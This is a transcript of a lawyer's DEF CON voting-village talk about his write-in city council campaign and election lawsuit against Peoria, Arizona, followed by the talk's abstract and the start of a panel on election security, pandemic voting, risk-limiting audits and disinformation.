similar structure of government, using a state constitution and establishing co-equal branches of government. But what is more important to understand is that these local state governments are typically much more impactful than the federal government in terms of your everyday life. So how do the national and state local governments share power? Let's take a look. Wow. This one might make your eyes glaze over, but stay with me. We know from before that it is the constitutions that inform us as to the sharing of powers between the federal and state local government. For instance, as you can see on the bottom of this slide, the 10th amendment of the US Constitution declares, as we'll discuss more later, the, and I quote, the powers not delegated to the United States by the Constitution, nor prohibited by it to the states, are reserved to the states respectively, or to the people. That's a mouthful and a very old sentence. We're talking 1776, right? So what does that mean? In other words, states have all powers not granted to the federal government under the Constitution. So conveniently, this slide gives some examples of the sharing of powers via exclusive and concurrent powers and what should really be a Venn diagram. But let's just focus on this slide from left to right. The exclusive federal powers are things like coining money and declaring war, conducting foreign affairs. In the middle, we've got concurrent and shared powers, and those are things like taxation and establishing courts. And finally on the right, we have exclusive state powers like conducting elections. And that's a little bit of a gray area because the federal government does have some administration aspects related to elections. And I wouldn't really call it a completely exclusive state power. But the states do control the elections and how they proceed. There's also providing for public safety, health, and welfare. But the point of showing this slide is to demonstrate that state and local governments have much more power to influence communities than is often expected by its citizens. So let's explore some of those local powers some more. The impact lies locally. Just take a minute to take in the amount of powers and responsibility that is delegated to local authorities. We have budgeting, prioritizing, human resource functions, program management, taxation, ordinances and resolutions, charter and constitutional amendments, zoning and land use and eminent domain, regulating public health and safety as we previously discussed, and liaisoning to other governments. But for today, we want to focus on elections. So now that we've briefly examined some of the structural foundations of the American government, we have arrived at our next point on this journey of learning. And that is the second point in the agenda. Stories from my own campaign and related lawsuit while seeking a seat on the local city council of the city of Peoria, Arizona, not Peoria, Illinois, for all the Midwesterners listening. Shout out to the SECKC, by the way. So why run? Well, I hope that the previous slides have established, at least in part, that running for local office can provide a great platform to bring positive influence to your community. And specifically on this slide is my answer in quotes to this question of why run that I gave to the local newspaper, Peoria Times. I talked about my campaign platform, community safety, more engagement and better protection of people's opportunities and legal rights. I also talked about my qualifications as a lawyer and my connection to the community. But what isn't on this slide or in the newspaper is clarification of what kind of candidate I was and how that impacted my chances of winning. And I don't mean what kind of candidate I was in terms of person or party affiliation, but from a procedural perspective. That is to say, I was a right in candidate. To understand right in candidates, think of Kanye West. He would most likely be considered a right in candidate for the 2020 presidential election, but he would not be considered an official right in candidate because he probably is not filed the necessary paperwork. Just as individuals often write in candidates like Jesus or Mickey Mouse, these candidates are not official. They cannot serve if they get to requisite number of votes. This is because they haven't complied with the other rules and regulations or filing of paperwork that might be necessary. So I was an official right in, meaning that votes for me would count and meaning that I filled out the extra necessary paperwork. But why was I right in? It's an unusual election that I took part in. And it also coincided with an unusual and unfortunate time in my own life, but I nonetheless found it important to carry on, as you'll see in the next slide. Despite the fact that most right in candidates lose their elections, why continue? Well, as was noted by my alma mater here on the right side of the slide, I felt compelled. But more importantly, why I felt compelled was because of my care for the community and to carry on what others before me had started. For instance, Carlo Rocky Leon, who became a sort of mentor to myself and my sibling, had received honors from the National League of Cities and earned the respect of his constituents in my city for over 20 years. I wanted to carry that legacy forward. And I would get that opportunity to try in 2018, or rather 2019. But let's first start with 2018. Background to the 2018 race, which I did not take part in. As I mentioned, someone I looked up to, Rocky, who was the Pine District Councilman for so long, he actually won the 2018 race, which I did not partake in. But unfortunately, a few months into it, Rocky's term was cut short. And due to health reasons, he was forced to resign. So this brings us to the background to the 2019 special election race. You can see there are two ballot candidates, Danette on the left, and Randall on the right. And there's me, the right-hand candidate in the middle. This story gets a bit more complex. During the election, Rains drops out for health reasons. And it is reported that he has said about his medically-forced withdrawal that having a very qualified right-hand candidate makes his decision a little easier. This will allow the voters to have a choice in this election. Hopeful for voter choice, you can see Rains quote there on the left and on the right. And perhaps Mr. Rains knew something that I didn't at that time. In fact, it's interesting to note that Mr. Rains was passed over by the sitting Peoria council who made the net done, the interim council member, and seemingly favored done after publicly backing her at events in the 2018 race that she lost. Thus, it's very possible that Mr. Rains may have already been aware of something afoot. But what was it? And this brings us to the controversy. Might not have been what Mr. Rains was thinking about, but he was concerned with the city providing choice to its constituents. And I'd like to begin talking about this lawsuit by reading the introductory paragraph of our complaint, because this gives the high level story of the lawsuit from my perspective. Though other lawyers may simply call it hyperbole, the ones listening in on the voting village will probably not. I quote, most election experts across the United States of America agree that our election processes are vulnerable in a variety of ways. These are not limited to attacks on elections from outsiders. In fact, this statement of contest concerns an unscrupulous internal attack and misinformation campaign that led to an election result that is believed to be illegitimate. Indeed, a democratic state necessitates that its citizens are adequately informed by the state or at a minimum are not misled or misinformed by the state about election matters. So what really happened? You can see something there on the right about a postcard and we'll definitely get to that. But the allegations against the city are many and should be viewed as cumulative. The allegations range from enforcing inaccurate and outdated sign regulations against my campaign, withholding voter data, improperly removing my campaign signs, and citing my campaign volunteers for irrelevant code violations. However, one of the primary controversies as it relates to this special election in 2019 is about a postcard. And specifically, the city overstepped its responsibility and improperly did so, not in accordance with the letter of the law, by sending out a postcard under a pretext of an update when that update clearly helped the city's preferred candidate over all others. Essentially, the city of Peoria, despite having an agreement with the Secretary of State to handle the election procedures, took it upon themselves to release a postcard not in line with the letter of law on or around the day that the ballots arrived. As you can see on the right side of the slide, the postcard which the court ultimately confirmed was sent to voters not in accordance with the letter of the law appeared to many voters to be confusing and as an endorsement of the other candidate. For the record, this was an all-male in election. And what's extra notable is that in order to win in the primary, you must win by a certain percentage, 50% plus one. And this is important because if there isn't a conclusive winner, then the general election would need to happen and all candidates would be on the ballot, including the right-in candidate myself. So in that context, the content of the postcard becomes very clear in its motives, especially its timing. The postcard contained a message that wasn't meant to simply inform of all candidates, in fact it didn't inform of all candidates. It was meant to partially inform of candidate updates and ultimately discourage wasted votes on one candidate in exchange for the other known candidate on the ballot. Let's take a closer look. As you can see here, on the left is the law. This is a part of our complaint and on the right is instructions that the secretary of state, not the city of Peoria, the secretary of state provided. And you can see the law on ARS 16343G, which is excerpt on the left side of the slide in our complaint, requires that notice of withdrawn candidates shall be made available by providing with the early ballot instructions, those are the things on the right, a website address for information regarding withdrawn and right-in candidates. So on the right side, look what was provided by the secretary of state. It's circled right there, a website address for updates about candidates. This follows the law, but this wasn't all that was done. This is all that should have been done, but let's look to the next slide to see what the city actually did in terms of notice to its voters, which we already know was in addition to what the state election law provides right here on this slide. So the postcards on the right, and the details are clearly more than what is required. It states how Mr. Reigns is no longer a candidate and that votes towards him will not count. Don't waste your vote on him. He's not, he's out of the race. So the implication here is if you want your vote to count, it's to vote for a single person on the ballot. Then that done or simply abstain from voting because a lack of awareness of another candidate. Notably, right-in candidates have the biggest challenge of really marketing and letting people know that you're out there and you're in the race and you are wanting to represent their interests. And to have this postcard come out and simply provide of what seems to be a partial update, not in accordance with the letter of the law, from my vantage point, this is a clear violation of law. It's not just not the letter, it's a violation. And the court agreed in so far as the city was not following the letter of the law, but as you'll see, that didn't matter much in the end. So what did I request as a remedy anyways? I wanted the result set aside. I wanted to organize a general election as scheduled and require primaries are inconclusive and to get on the ballot of any new election. And crucially, I wanted to stop officials from exerting improper influence or engaging in misconduct. But what's really important to understand is that I did not want to file this lawsuit against my hometown. This is a painful experience, one that was awkward. And ultimately, just as I felt compelled to run as a writing candidate, I felt compelled to file this lawsuit for my community and the hundreds of individuals that wrote my name on the ballot correctly, I might add, which is a feat. And because I saw something that I thought was wrong, I thought it was a violation, I wanted to have a judge take a look at it and make a determination for the betterment of our election system. But that's not exactly how the press covered the story. And it's not how the city view the lawsuit either. So as you might expect, the city of Peoria maintained that they did nothing wrong. The city of Peoria and interim council member Dunn sought dismissal of the action. The city went as far as claiming that the court didn't have jurisdiction over the city due to perceived lack of service of process. And I'm not going to go into why I don't agree with those arguments, but I will go into some of the procedure. And this is for all the legal nerds out there. The case was set for a hearing on a motion to dismiss, but we ultimately received an expedited hearing on the merits after informing the judge through another emergency filing that the case was an election contest. And that we were entitled to an evidentiary hearing on the merits of the case within 10 days, according to Arizona law. The judge agreed and we were eventually offered an evidentiary hearing. But we were ultimately not successful, despite that we believe there were multiple violations of law and that the city admitted in court for the application of inaccurate election related regulations against my campaign. Moreover, the press was not particularly kind, making the lawsuit appear frivolous and as a waste of resources, so much so that I was getting additional hate mail, something you just get used to as a politician or a would be politician, I guess. Also, what's critical is that the judge did not believe the lawsuit was frivolous and did not order me to pay the city or Dunn's attorney's fee. I guess that's a small win. So, before discussing lessons learned, I want to turn to Montesquieu on the spirit of laws because it is relevant to how I feel in this instance as, well, they follow the spirit of the law, not the letter. But it's also relevant because it was required reading for our founding fathers. Montesquieu writes in reference to a brutal state with not much of a procedural due process in terms of a legal system, I quote, for one to have the passions of pleaders would be quite dangerous, the passions presuppose an ardent desire to see justice done, a hatred and active spirit and a steadfastness in pursuit of justice. To me, this quote stands out because I believe I was perceived as a threat, a political one. And upon making my pleadings be known in court, I was considered even more so. Despite that in my heart, spirit and actions, I was simply seeking justice for the people. Maybe that is exactly why. But just as the local papers quotes of mine on this slide demonstrate, despite disagreeing with the decision, I decided to move on and not appeal for practical reasons, like money and time and futileness. Or perhaps, as in the words again of Montesquieu, each man should know that the magistrate must not hear of him, and that he owes his safety only to his nothingness. So no appeal. Alas, all said and done, I consider this lawsuit a small victory towards ensuring election integrity, and I hope the lawsuit encourages others to file similar legal actions. It should be noted here that if you're a voter, you probably have legal standing to sue. You don't have to have skin in the game like I did. So if you see or experience suspicious activities or misconduct during an election, say something. Now we can get into the bigger picture and lessons learned. So this personal experience that I wouldn't really wish on anyone made me dig deeper into our electoral system. And from my research and experience, it has become increasingly clear that many human and structural problems exist, including how the branches of government share power related to elections and the jurisprudence related to how the courts decide matters and importance concerning election issues. Although I do not bring forward a complete solution, below are some of the primary issues that I believe we need to address as a society to ensure a more secure and fair democracy. We need to implement strong federal standards for protecting voting rights and eliminate pretext for stacking the deck. The case that really comes to mind is Rouge versus Common Cause, which is a 2019 Supreme Court case involving North Carolina and Maryland racial gerrymandering, which is of course redrawing of district lines to have a political guarantee of seats, say. And the court ruled against the plaintiffs finding that the partisan advantage is actually permissible in terms of intent behind district and choices, because this issue is to be left with the legislature and not to be decided with the courts. And the turning point for the decision was there are no legal standards that are discernible. So, and they turn to fairness and they say fairness, as you can see on the slide, fairness is not a judicially manageable standard. And I just, I find that to be untrue, because courts sit in fairness and equity all the time. So a decision like this, it makes a lot of people cringe. And I believe this was a 5-4 decision, meaning it was really close. And that means our Supreme Court justices were not in agreement. And so hopefully this case gets revisited along with some other cases. But I don't have time to go into a whole lot of other cases. But what I would like to discuss is the pandemic election litigation happening in 2020. And as of right now, there are dozens and perhaps maybe by now hundreds of cases that over the past few months have been just ticking up in terms of numbers. And this really spells trouble. It could either be a good or a bad thing. It means people are fighting inequities or, and I guess there's, each dispute will have a side to it. I just hope that a lot of these pandemic election litigations get resolved in the proper way. Because these are dealing with things like how do high-risk individuals in a pandemic in a hot spot accomplish voting safely? This is not something that America should really be struggling with in 2020. It seems it seems beneath us. And I really implore all those that are still listening to speak up about these election fairness issues and voting rights and become more knowledgeable on these topics. I'm not the top expert in this field. I'm a privacy lawyer, data protection lawyer. This is something I learned almost on accident. And so for all those that aren't on the front lines of the litigation, let's go to the bottom of this slide. I would say get involved in the fight for democracy and more secure elections by getting involved in different organizations like support, fighting election disinformation, which is what the election and integrity partnership is doing EIP. And I love this idea because they are not focused on the candidates, what the candidates are saying. They're focused on content, so not necessarily political content, but content intended to suppress voting, reduce participation, focus or confuse voters as to election processes, or delegitimize election results without evidence. These are certainly big ticket items and challenges in 2020, especially with November right around the corner and with so much misinformation out there, not simply by as in this case, it was alleged that the misinformation was coming from the government. And I think that's happening probably throughout the government of the United States, but I think as it relates to a lot of disinformation, we have to be very wary of things we're seeing online. So do your part in encouraging others to be careful, those that might not be so digitally savvy as those that might be listening to this presentation. So I really want to close this with some concluding thoughts and not get too hung up on a lot of the other cautionary tales that are out there. And clearly, as I mentioned, there's dozens and dozens of them that are playing out in the courts right now. So be on the lookout for those things, be aware of these things that are happening, and speak up against them when you can. So to conclude here, this story and experience, it didn't make me lose faith in democracy. It wasn't a negative experience. There were negative aspects of it, that's for sure. There were painful moments, but speaking to constituents that felt like they were misled by the city, and they're asking you to help fix it, that was something, again, I felt compelled to do, and I did it. And we fought the fought, but we lost those battles. And I think the war is still raging on. So these are two lost battles, a lost election and a lost litigation. But I did learn a lot. It was a journey of learning. And I didn't think I needed it as a lawyer, but I did. And I'm glad I endured this. And some of the lessons that I learned are listed here. So we can read through the slide together. Democracy is not perfect, right? It's made up of humans. You get things wrong. And it's not just institutions, right? It's not just separation of powers. And that's it, everything's okay. And hackers know the persistent vulnerabilities of humans in pursuit of securing any information system. So it should make sense to all hear that humans need monitored closely, especially when democracy is at stake. Strengthening voting rights and securing elections will require hard work and advocacy, which usually means money and lawyers and lots of it and them, for better or worse. And election litigation, as I've come to find out, is a beast of its own. Remember, I'm a data protection lawyer, and not an election lawyer. This happened by accident. And knowing the importance of these cases, these election cases and the expedited schedules for resolution makes this fight for democracy very difficult without experts. So if you see something, say something, if you're involved in helping advocate for voter rights, and you see something, or you run for local office, and you see something that you don't think is right, reach out. Reach out to me. I may not be the person to help you, but reach out to somebody that has more knowledge than you do. I perhaps would have done better in the litigation had I sought out an election lawyer early in the process. But that wasn't in the cards for me. I hope it will be for you if you ever find yourself in such a bind. And here's the bonus lesson, might already know this one. But for those of you that get into politics, local, or otherwise, or find yourself for whatever reason speaking to the press, do not blindly trust them. Usually, they're not interested in telling your story, or sometimes not even the true story. And they are often interested in telling their own version of the story for their narrow reader base. And I can't hate them for that. They are making a living. That's their job. But do not trust them blindly. It will do more damage to you than good. I would bet on that. So thank you so much. And I'm happy that I had this opportunity to do this, even if it was virtual. I really appreciate all of you that stuck it out and made it this long. Thank you so much. I appreciate you. If you have questions, please reach out to me. And as you can see here, my own lawyer on this case, who is also not an election lawyer on the left there, Brittany, is another sublime law attorney. And she's here with me on the left there at DEF CON 27 voting village. And we will return. So if you see us, make sure to say hello. We will definitely stop into the voting village and try to gain some additional knowledge as the years go on. So thank you all and have a great and fantastic rest of your summer.
Join Cordero Alexander Delgadillo, a business and technology lawyer, and more recently a former political candidate, as he demonstrates that elections, especially local elections, are akin to information systems (even reasonably locked down systems), because both are highly susceptible to the very non-tech, human vulnerabilities (nefarious and negligent). In this talk Cordero will provide insight by: - Examining the structures of American Democracy - Telling stories from his own election lawsuit: Delgadillo v. City of Peoria et al - Highlighting election process issues deemed “inconsequential” or “un-addressable” - Sharing information and resources
10.5446/50758 (DOI)
Hi, welcome to election security part two, the infrastructure strikes back. My name is Amelie Cran. I will be your panel moderator for this session here. Little did we suspect that this set of panelists would be back together six months later to discuss where we are versus where we were when it came to election security and the upcoming November general election. This then to say it lightly, things have gone off the rails, given that you now see us by a video in our pandemic past. We've had a highly contentious democratic primary season, some technical glitches supporting such primaries, court cases in regarding in-person voting and enough various disinformation campaigns to last another election. One thing that hasn't changed is the lineup of our esteemed panel from Shmucon. And tonight we have Kimber D'Ausset, Casey John Ellis, Jack Cable and Todd Beardsley. I will then let them introduce themselves with a short intro. Hi, I'm Kimber. I am the director of security engineering at TRUST. That's trust.works, a software infrastructure company based out of San Francisco that works with both the public and private sectors. Hi, my name is Casey Ellis. I'm the founder, chairman and CTO of Bug Crowd. We run Crowdsales security as a service programs, including Voluntus Glosure, Bug Bounties, Crowdsales, Pentest and so on. And yeah, great to be unusual to be talking about this with all the additional content, but very good to be talking about it again. Hi everyone, my name is Jack Cable. I am an election security technical advisor for the US Cybersecurity and Infrastructure Security Agency, which is essentially the nation's risk advisor. We advise states and localities on the risks associated with different technologies, provide cybersecurity assessment services so that they can make the best decisions to have a safe and secure election. Besides my work at SZA, I am a student at Stanford and a security researcher. Cool, and hi, I'm Todd Beardsley. I'm a director of research at Rapid7, a US-based cybersecurity company. I personally care a lot about elections. I am usually an election judge in Texas, and I have a deep background in hacking, offensive security, research, vulnerability analysis, stuff like that. And congrats to Jack for the level up since our last meeting. He gets a bunch of power-up points on that one. That's awesome. So we're going to break this down into two sections, I believe unlike last time, but mainly a catch-up, a first section here about what has happened since February. So we have a couple of questions regarding that. And then obviously a section B, we're coming up on about 90 days till the general election. And what we can do between now and then, since the timeline is definitely shorter, but also what kind of activities are going to be carried forward from them to the next elections, next primaries, or just in general lessons kind of learned. So with that, we have ourselves a first question here. So we find ourselves here again after six months, and there's been a lot going on that we didn't cover back in February. However, regarding one of the last takeaways from closing that panel, we noted it was important to engage your local board of elections. And with that, where do we stand? Wow. Well, let me start this up. I engage with my local board of elections by being an election judge. I ran a polling place not too long ago about, we're recording this on end of July. So for me in this time stream, this was about three weeks ago, there was a special election and a runoff election combined here in Texas. It was pretty fun. I never knew that wiping down voting polling places would be so rewarding. I got to feel like I was battling COVID like every five minutes, helping people out, helping people vote. And for that, at least for me, I felt like I was doing something. I did notice through training and then on election day, the demographics have switched over quite a bit on who is working in the polls. It is very common normally to see a lot of retirees and older people who are there to help out and help out their communities in this way. I was not the youngest person at this polling place, which was first for me. So if you have the opportunity and the inclination, and don't mind doing a whole lot of cleaning all day long, maybe volunteer to work in a polling place come November. Anybody else? Yeah. I mean, what has happened since then, I think in terms of rocking up and helping out, it's fair to say that any intention to do that would have been a little distracted by March and so on. But I think Todd's example of just doing what's needed, especially with the pandemic and the changes in operational considerations around actually running an election, still true. It's even more true now, I think, than it was. As the token non-citizen on the talk, I mean, this is even more foreign interference now than it was when we gave the talk to you because I'm actually in Sydney at the moment. But part of what we've been working on, what I've been working on and a bunch of other people have been working on is standardization of how do we make adoption of vulnerability, disclosure programs, and the implementation of policies specifically for 2020 with all of the unique considerations this year has, how do we make those easy as possible for the states and counties? So we updated a version of the language on disclose.io, which is an open source initiative to basically make it easy and make it as standardized as possible that came out after the talk. And it's been good. I think at the very least, that's actually served to get a lot more people thinking about doing that that maybe weren't before because that kind of blocking function of how do I even engage with the hacker community in the first place was, I think, pretty difficult for a lot of people to even consider. Certainly to echo Casey's point there, I think, yeah, something I've been involved with and pushing for is states and vendors to establish these vulnerability disclosure policies. On the SISA side, we are releasing guidance to election officials in order to establish vulnerability disclosure policies, essentially saying if you want to do this, this is the best practices that you can follow. A lot of that is drawn from SISA's directive, finding operational directive 20.01, which is a draft directive that will require all federal agencies to start vulnerability disclosure policy. Yeah, that was a big deal, by the way. Yeah, I think, really looking forward to see that come out and see the positive security effects that can have all across the federal government. But of course, SISA doesn't have that same authority over states. So we're essentially putting out guidance, giving them the best practices and the resources they need to start this themselves if they want that. And then of course, yeah, besides that, just the homework I've been doing, yeah, clearly, not at the local level, but the federal level. I think that there's really a lot of ability there to kind of have an impact at scale of working with all 50 states, working with a significant portion of the localities of the counties that are out there. So I think that's a really great opportunity to be at SISA and have this kind of wide-ranging effort, wide-ranging effects that I'm not sure you can have anywhere else with election security. Kimber? Yeah, I'll jump in. It works out well since Jack touched on Casey's point. I'm going to touch on Todd's point. But the prompt was, you know, what's happened since February and the answer is a pandemic. So the reality of a lot of the election security, things that we would normally talk about and that we will touch on today, still rely on people being able to actually get to the polls to vote in states that aren't going to allow mail-in ballots. So I think it will be a nice segue into a lot of the misinformation we're hearing about mail-in ballots. But to Todd's point, we can scream to the skies that mail-in ballots are perfectly safe and reasonable and actually help disenfranchised voters have a voice. But there are going to be some places that folks go to the polls and somebody has got to be there to man the polls or we're going to end up in a different type of disenfranchisement, right, where people are lined up for 20 hours because there's three poll workers, you know, for thousands of people who want to vote. So it's important to know what's going on in your voting district and if your voting district allows mail-in voting, great, cool. But if they don't, like, that's a perfect opportunity to get involved. And I understand that it's asking you to put yourself at risk, too. And that sucks, right? It is. Yeah. That's where we're at. I am shocked. I had a COVID test about four days after Election Day and I am shocked. I did not come up positive. But hey, turns out masks and hand cleaning and surface cleaning works, though. Yeah, kind of the follow-up on this, too, is obviously the curveball of the earth, the pandemic. And as Todd mentioned, primarily a lot of the election workers that were counted on by various precincts and states in general were retirees and those who, I hate to say it, but have more time in their hands. This is obviously going to be proving a challenge for staffing and it runs headlong into the issues, obviously, some of the disinformation that's been spread about mail-in voting. Are there any particular ways that we can kind of mitigate or address any of these issues that are novel? Obviously, we're running headlong against people pushing back on the mail-ins, but then we have the reality of folks potentially exposing them to a deadly virus. I hate to run the gambit of talking about, like, e-voting. But obviously, there are other ways to look at potentially extending voting times, alternating places where people can vote to reduce exposure. Are there any other methods that potentially the EAC and others can address in this case? In Before Blockchain. Yeah, I wasn't the right one. You have to drink now. I mean, e-voting is a non-starter. Right? We're recording this and it is today, 97 days. By the time this airs, it'll be about 90 days before the election. West Virginia is doing their thing and good for them. No one else is. I don't see anybody having any plans for that right now. Maybe someday in the future, e-voting will be a thing, but I think the easiest way to get people to the polls in states that don't have mail-in ballots is extending early voting. That's a thing. Texas, I'm in Texas right now, so, Texas. We're bad at mail-in ballots, but we're apparently really good at early voting. My first date of vote in November will be October 13th. That's a stupendous amount of time, way longer. That will help at least give people an opportunity to get into a polling place when it may be not so crowded. Last day of early voting is super crowded and election day will be super crowded. If you can vote in that early voting period, I strongly suggest you do. It doesn't help any of the IT problems that we talk about and that nominally this panel is supposed to be about, but it does help the not getting COVID, which might be a little more important. Kimberly? I want to add a plus one to the adding more polling places because we know social distancing is huge to prevent the spread of COVID. When we have communities like mine where there's one polling place downtown and then one local school, then we have basically the town split in half to go to these two polling places, and it gets kind of crazy. Seeing people to districts, we see some gerrymandering. They'll draw a line right through the middle of the university so that half the university students think that they're supposed to vote at one place and it's really the other. If they're going to say no mail-in ballots, then why not say, but all the schools in a single district can vote, and if you're eligible to vote in one, you can vote in any of them so that folks can at least get to the closest place, and we do our best to disperse the population. But a lot of towns have a couple polling places. There are most always schools, which who knows if schools will even be open, but if they are, you sure don't want to have 100,000 people rolling through a school that children are going to be at the next day. So there's physical considerations that certainly were not part of our equation in what February 1 when we jammed through all the things we think could go wrong. This was not on my bingo card. No. No, no. So the thing that's to me that's new is, and I've actually heard Todd say this in a panel on this before, democracy does rely on the peaceful concession of whoever loses. So the increased likelihood of a hanging count because of mail-in voting and the changes in the process and different things like that, I think there was a lot of conversation back in January and prior around the role of risk limiting audits to basically say, no, this is not like any accusation or fraud can be basically the confurnal denied at that point. Projects to give a shout out to is ARO, ARLO, which is essentially a framework for that that I believe is funded by CISA and is open source. And something that I've been trying to encourage people in the security research community to do is to go bang on that, actually go look at it from a security standpoint because ideally if there's any point in time over the next six months where ARLO itself gets called into question as a tool to rebuy, at least at that point we can say, no, we actually went through this and it seems legit. So that to me is new. That was always going to be some to some degree of risk as it always is. But I think that's actually a far greater role actually post-election on election day and post-election day in 2020. Yeah, I think they covered a little bit of that on the HBO special of Hari as well as I think it was the second half of the documentary was regarding the risk limiting audits. I don't know if they necessarily had a really good explanation of how it all worked. That is a little extra math for most folks, but it's one of those good things that can be put in. I think in looking at, so calling myself out, this was a theme and last time we got together as well, acronym, deacronyming stuff. So risk limiting audit is what RLA stands for. I think it's verified voting who are running point on it and they've done some pretty, I think good work on explainer videos that take some fairly complicated math and kind of simplify the concept to the point where a non-technical potential voter can actually consume it and understand what's going on. It's essentially a cryptographically determined sample, random sample set that's then paired with verification of the outcome compared to what's recorded. And if there's any sort of deviation or margin of error within that sample set, then it goes again and goes again and goes again until it can work out the scope of that. Or if everything checks out, then everything checks out and things are okay at that point. It's the randomization and the process around it that I think is to your point difficult to explain on a technical level to most people, but I think the concept itself is actually very easy to take rock. Great. And just to kind of go back a little to our discussion, the different kinds of voting options that there are. It's clear that the election is going to be run a little differently this year. Just with the constraints we face, election officials have to provide an accessible and safe method of voting for their voters. And what this means is essentially from CISA's perspective, we want to limit the risk as much as possible with these options. So for instance, talking about online voting, also called electronic ballot return, CISA has assessed that that is high risk even with controlled in place. The risk there still cannot be controlled. And it's not CISA's job to decide whether these are deployed, but it's our belief that the risk on these is much higher than say compared to in-person voting or mail-in ballots. So on that end, CISA has put out a series of documents essentially describing from a procedural sense what kinds of options election officials have both to ensure safe in-person voting and then also to make sure that mail-in balloting process goes smoothly. And just to touch on some of the in-person voting options there, it is very true of course that like Todd was saying that truth is a lot of these poll workers are older and they face a high risk of being impacted by the virus. So there's going to be very high poll worker shortages. And a lot of cases that means consolidation of polling places because they can't staff that many. And that of course can lead to problems because then you have more people in fewer places with a pandemic that's of course not ideal. But we have to make it work. So one option there is vote centers for instance where larger physical polling places that make it easier to maintain physical distance. There's of course still a polling shortage. I guess here I'll say to everyone who is young and healthy, the best thing you can do is serve as a poll worker and make sure that on a local level your elections run smoothly. But yes, it is going to be a challenge just because yeah, of course in-person voting carries some risks with it from a health perspective. So we encourage states to make the decisions that best fit them, but both mail-in balloting and in-person voting we view as being low risk options given that there's a paper trail and you can run and save risk when you're on it on those. So I'm going to take kind of a little bit of a left turn. I know we just full transparency for folks who are watching this. We have a list of questions that we've agreed on, but I'm going to kind of find this because of the way the flow is. One of the things that's amazing about where we live, we're in the United States here and Casey accepted, but we'll adopt you on this one. This is the freedom of speech, as part of our own constitution and whatnot, but as we mentioned in February, one of the critical things about this election is how we talk about it, whether it be through discourse about outcomes, whether it be the primaries or the general election, the methodologies we use to do that. So we talk about the press about how things have gone, the process of how we go about voting, but also it's another thing called disinformation or misinformation where what we talk about is willingly bad, essentially not right when fact checked, or in some cases is disinformation provided by an extra entity. I know what the 2016 and earlier, the recent, the midterms, we had influence from outside sources and obviously, Washington Post just recently kind of covered that we're potentially seeing some influence from China and Iran and some of our other, you know, we classically qualify them as adversaries, but yet we still find some ways to deal with them. Where do we kind of find ourselves in this case right now? Obviously, six months later, we had a little bit of a kind of, I would say necessarily contentious democratic primary, but it was a lot more graceful when people basically said, yeah, I'm out and let people carry forward, but also in recent news about how people are talking about the legitimacy of the methods that we're using, where do you kind of see ourselves now and what can we do in the future here both as folks who are attendees to this video, but also as responsible citizens to kind of educate others, your parents, your friends, your peers, your neighbors, and so forth to be on the lookout for this. I'll rest into the fire. I think an interesting thing that I've seen is that, yes, when we did our panel back in early February, which seems like so long ago now, I think that we could pretty clearly say like Russia. We're seeing the Twitter bots, the farms, we're seeing like the disinformation campaigns on Facebook, Twitter, IG. Now it's much more complicated. So the interesting thing that we've seen now are, well, I feel like it's interesting because I'm a social media nerd, the QAnon accounts that have popped up seem to span the gamut of countries. And you see a lot of activity from these QAnon accounts just coming from the US, and they're not like some complex combative nation state. They're from just like diehard MAGA people who are like, I'm going to do my duty and this is patriotic and they are figuring out how to spin up bots. And so that's pretty interesting. And then to see bots that'll respond to Trump accounts, right? Or the interesting thing that I see a lot too are accounts that get a lot of followers because they'll post pornography, right? And then they get loads of followers and then they get verified in some cases. And then as soon as they get the check mark, they switch to like QAnon accounts that have give themselves some name that you can recognize in the media. And all of a sudden you think you're engaging with someone that you're not engaging with. But what that does is have this celebrity or verified boost of this misinformation. So for me as a person who has a blue check mark, I want to say, I don't know anything. I'm not an expert on any fucking thing. And I'm going to tell you flat out that like you'd be hard pressed to find a blue check mark that is an expert on everything. So if someone gets their blue check mark for being an actress, like maybe don't just immediately trust that they're an expert on vaccination protocol, right? So I think that it's really fascinating how the floods are coming and the stuff that Cambridge Analytica did, it's all still happening under a different name, a different company, but it's all still out there on Facebook and Twitter. It's just like now more people from different countries, including our own are able to participate in the disinformation process. Yeah, I'll tag in on that. Just confirm what you're saying, like the QAnon stuff and things of that nature that they're happening on the ground here in Australia. I think for ostensibly different reasons from a partisan political standpoint, but it's kind of coming from the same mindset. And I think in part, like we're all going a bit stir crazy right now. It's good not to ignore the fact that society just in general is dealing with mental stress that we've not seen collectively for as long as Twitter's been around definitely. So weird shit happens. But yeah, there's that piece of it. I think Kim, you touched on a really good point. I actually got invited to talk about disinformation on a friend who has a cooking channel. She's got like millions and millions of subscribers, but she saw basically bought like advertising focused bot generated content ripping off her stuff. And then noticed that there was subversion starting to creep into that and the ability for that type of channel to be used. It's so crazy, it's nuts man. Like it was and I'm like, what am I doing on a cooking channel? This is crazy. But no, they have an entire channel on this like basically debunking some of these these bots or the content farms. Yeah, it's a real thing. And I think the ability for that sort of thing to be deployed very rapidly because these are these are businesses. It's businesses that exploit the things that are exploitable to build following on social media in some of the ways that Kim had just described, but then they sell that or rent that or if they're owned, you know, potentially by by, you know, an active that can go hostile. It's really played into that. And that's happening across all sorts of different channels. The one you asked Amelie about, you know, things that we can do. I think something that we can all agree on the great hack, for example, just as a, you know, a way to get people that aren't necessarily technical in a, in a context that's apolitical. So you're not sort of going one way or the other too much. You just explaining to them, this is general idea that like social media is a constructed reality that's been built just for you. And you actually need to be observing it like that. I think, you know, for the, for the hackers that are kind of watching this, that's probably a thesis and something that's important that we could all agree on. And I found that to be fairly, fairly helpful. And just to talk briefly on foreign disinformation, of course, that's a very large concern we've seen in 2016, what happened. And in 2020, it seems to be shaping up again. We know, yes, our nation's adversaries, Russia, China, Iran are all targeting trying to interfere in our democratic processes. So from CIS's perspective, our number one priority is to ensure that Americans decide American elections. So that means ensuring that foreign adversaries are not able to interfere, whether that's by actually targeting election systems, whether that's disinformation campaigns, all that it should be Americans who are deciding American elections. So that kind of leads us to the point then, what steps can Americans take to mitigate the impact say of disinformation or just general confusion, say on election night. I think the most important thing here is just to understand that elections are going to be different this year. Election night November 3rd is not going to be the same as election night in the past because with many more mail-in ballots, they're going to take much longer to count just due to state laws and processes around that, as well as just technical constraints. Since some states are rapidly scaling out mail-in ballots at a scale that is maybe tenfold from what they previously had up read. So with that perspective, election night, it is entirely possible that it just isn't final what the election results are. And it may take a week, it may take several weeks to actually learn what the final results are. So the best thing that Americans do is to just internalize this, understand that election results are not going to come out immediately. India has a part for all of this, that it can't just be election night, the final results to clear who won because we've to acknowledge that might not be the case. So I think that if we all are on the same page expecting this to be a slower process and keeping in mind that a slower process means that there's more time to actually verify that results are correct and to ensure that the final count is ultimately the right one. So I think just understanding that patience is needed here and that election night not going to know who won, it may take some time, but we'll get there and we can be confident then in 